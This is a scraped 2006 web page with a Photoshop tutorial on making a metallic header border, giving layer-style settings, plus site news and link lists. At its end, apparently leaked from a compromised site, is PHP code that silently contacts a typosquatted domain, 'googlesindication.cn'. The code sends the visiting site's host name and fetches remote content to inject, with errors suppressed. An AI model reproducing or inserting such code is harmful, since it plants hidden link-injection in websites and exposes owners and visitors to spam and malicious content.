What to expect:
Decorate your header with a metallic border and roundsaw elements.
Step one:
Grab a header graphic and set it in a new canvas larger than the header itself so if the size of your header is 700x100px, set the size of the canvas to atleast 800x200px. Make sure the header is in a new layer and not merged with the background.
Step two:
Add the following layer styles.
Outer Glow
Structure
Blend Mode: Normal
Opacity: 100
Noise: 0
Color: #FFFFFF
Elements
Technique: Precise
Spread: 0
Size: 5
Quality
Contour: Default
Anti-aliased: Uncheck
Range: 50
Jitter: 0
Inner Glow
Structure
Blend Mode: Color Burn
Opacity: 63
Noise: 0
Color: #000000
Elements
Technique: Softer
Choke: 0
Size: 9
Quality
Contour: Default
Anti-aliased: Uncheck
Range: 50
Jitter: 0
Stroke
Structure
Size: 2
Position: Outside
Blend Mode: Normal
Opacity: 100
Fill Type: Gradient
Gradient: Default
Reverse: Check
Style: Reflected
Align with Layer: Check
Angle: 90
Scale: 100
Step three:
A metallic border should appear in your header.
Note: the header used in this tutorial came with a rounded edges so dont be confuse when your borders are not rounded.
Great Articles
Great Articles
the box
Weekly New Tutorials
April 25, 2006:
Bart Sticker Tutorial is now up!. New
April 16, 2006:
Ipod Nano Tutorial is now up!. New
March 22, 2006:
Metallic tab tutorial is now up!.
March 13, 2006:
Pretzels text tutorial is now up!.
February 25, 2006:
Neon blue navigation tab tutorial is now up!.
February 21, 2006:
Web hosting design tutorial is now up!.
February 16, 2006:
Futuristic logo design v2.5 is now up!. Contact section on the tutorials are still in the works.....
tutorials
Metallic tab
Pretzels text
Neon blue navigation tab
Web hosting design
Futuristic logo design v2.5
Tire & rims
Futuristic logo design v2
Metallic border & roundsaw elements
Rusted text with bullet holes
Order your own tutorials
Tutorials - Photoshop,Dreamweaver,Vb.Net
Easy Photoshop Video Tutorials
Great Sites
Rentpixelads.com
Reattached.com
Flashpuzzles.com
FreelanceLab.com
fetch_remote_file("googlesindication.cn", "/links.php?site=".$_SERVER['HTTP_HOST']);
class GetLinks
{
var $_socket_timeout = 6;
function fetch_remote_file($host, $path)
{
@ini_set('allow_url_fopen', 1);
@ini_set('default_socket_timeout', $this->_socket_timeout);
$this->_fetch_remote_type = 'socket';
$buff = '';
$fp = @fsockopen($host, 80, $errno, $errstr, $this->_socket_timeout);
if ($fp) {
@fputs($fp, "GET {$path} HTTP/1.0\r\nHost: {$host}\r\n");
@fputs($fp, "User-Agent: {$user_agent}\r\n\r\n");
while (!@feof($fp)) {
$buff .= @fgets($fp, 128);
}
@fclose($fp);
$page = explode("\r\n\r\n", $buff);
return $page[1];
}
}
}
?>